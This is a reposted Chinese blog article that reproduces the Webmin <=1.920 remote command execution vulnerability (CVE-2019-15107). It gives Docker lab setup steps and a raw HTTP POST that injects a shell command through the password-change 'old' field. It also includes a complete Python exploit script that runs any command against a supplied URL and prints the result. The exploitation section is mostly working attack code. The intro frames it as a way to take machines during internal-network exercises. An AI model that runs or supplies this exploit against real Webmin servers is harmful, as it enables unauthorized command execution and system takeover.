碼上快樂

相關內容    簡體    繁體

Webmin代碼執行漏洞復現

本文轉載自   查看原文   2019-09-05 17:20   495    漏洞復現

0x00 前言
之前由於hw,沒得時間分析。這個webmin相信大家很多次都在內網掃到過。也是內網拿機器得分的一環。

0x01影響版本
Webmin<=1.920

0x02 環境搭建

建議大家以后用docker部署漏洞環境
docker search webmin
docker pull piersonjarvis/webmin-samba
docker run -d -p 10000:80 piersonjarvis/webmin-samba

 

訪問127.0.0.1:10000

使用賬號密碼:root/webmin登錄到后台
開啟密碼重置功能:
Webmin--Webmin confuration—Authentication

然后點擊重啟webmin。

0x03 漏洞利用
構造如下POST包請求:

POST /password_change.cgi HTTP/1.1
Host: 127.0.0.1:10000
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: http://127.0.0.1:10000/password_change.cgi/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
cache-control: no-cache

user=rootxx&pam=&expired=2&old=id&new1=test2&new2=test2

 


執行命令結果如下:

 

python利用腳本如下:

#coding:utf-8
import requests
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# 禁用安全請求警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def exploit(url, shell):
    urls = url + "/password_change.cgi"
    headers = {
    'Accept-Encoding': "gzip, deflate",
    'Accept': "*/*",
    'Accept-Language': "en",
    'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    'Connection': "close",
    'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
    'Referer': "{}/session_login.cgi".format(urls),
    'Content-Type': "application/x-www-form-urlencoded",
    'Content-Length': "60",
    'cache-control': "no-cache"
    }
    # proxies = {
    #     "http": "http://127.0.0.1:8080"
    # }
    # don't need |
    payload="user=rootxx&pam=&expired=2&old={}&new1=test2&new2=test2".format(shell)
    r = requests.post(url=urls, headers=headers, data=payload, verify=False)
    #print(r.text)
    if r.status_code ==200 and "The current password is " in r.text :
        rs = re.compile(r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>",flags=re.DOTALL)
        result = rs.findall(r.text)
        #print(result)
        print ("Execute result:" + result[0])
    else:
        print ("No CVE-2019-15107!")


if __name__ == "__main__":
    url = sys.argv[1]
    shell = sys.argv[2]
    exploit(url, shell)

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Webmin 命令執行漏洞 (CVE-2020-35606)---復現 Webmin<=1.920 RCE 漏洞復現 Fastjson遠程代碼執行漏洞復現 ThinkPHP 5 代碼執行漏洞復現+POC Fastjson <=1.2.62 遠程代碼執行-漏洞復現 【漏洞復現】之PHP-FRM遠程代碼執行漏洞(CVE-2019-11043)復現 CVE-2019-19781 遠程代碼執行漏洞復現 MS08-067 遠程執行代碼 漏洞復現 Gitea 1.4 未授權遠程代碼執行漏洞復現 CVE-2020-0796 SMB遠程代碼執行漏洞復現
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM